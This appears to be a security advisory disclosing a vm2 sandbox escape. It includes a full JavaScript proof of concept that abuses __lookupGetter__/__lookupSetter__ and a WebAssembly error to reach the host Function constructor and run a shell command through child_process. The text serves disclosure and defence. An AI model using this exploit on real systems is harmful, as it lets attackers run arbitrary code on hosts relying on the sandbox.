GHSA-v6mx-mf47-r5wg

### Summary By combining `Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__")`, `Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__")`, and Node.js's `ERR_INVALID_ARG_TYPE` Error, the host's `TypeError` constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code.

### PoC ```js "use strict";

const { VM } = require("vm2"); const vm = new VM();

vm.run(` "use strict";

const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"); const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");

async function f() { try { await WebAssembly.compileStreaming(); } catch(e) { setProto.call(getProto.call(e), null); }

try { await WebAssembly.compileStreaming(); } catch(e) { const HostFunction = e.constructor.constructor; new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" }); } }

f(); `); ```

### Impact Sandbox Escape → RCE